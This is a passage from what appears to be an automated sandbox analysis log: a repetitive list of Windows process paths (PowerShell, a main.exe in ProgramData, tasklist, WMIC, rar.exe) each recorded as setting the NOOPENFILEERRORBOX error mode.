Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
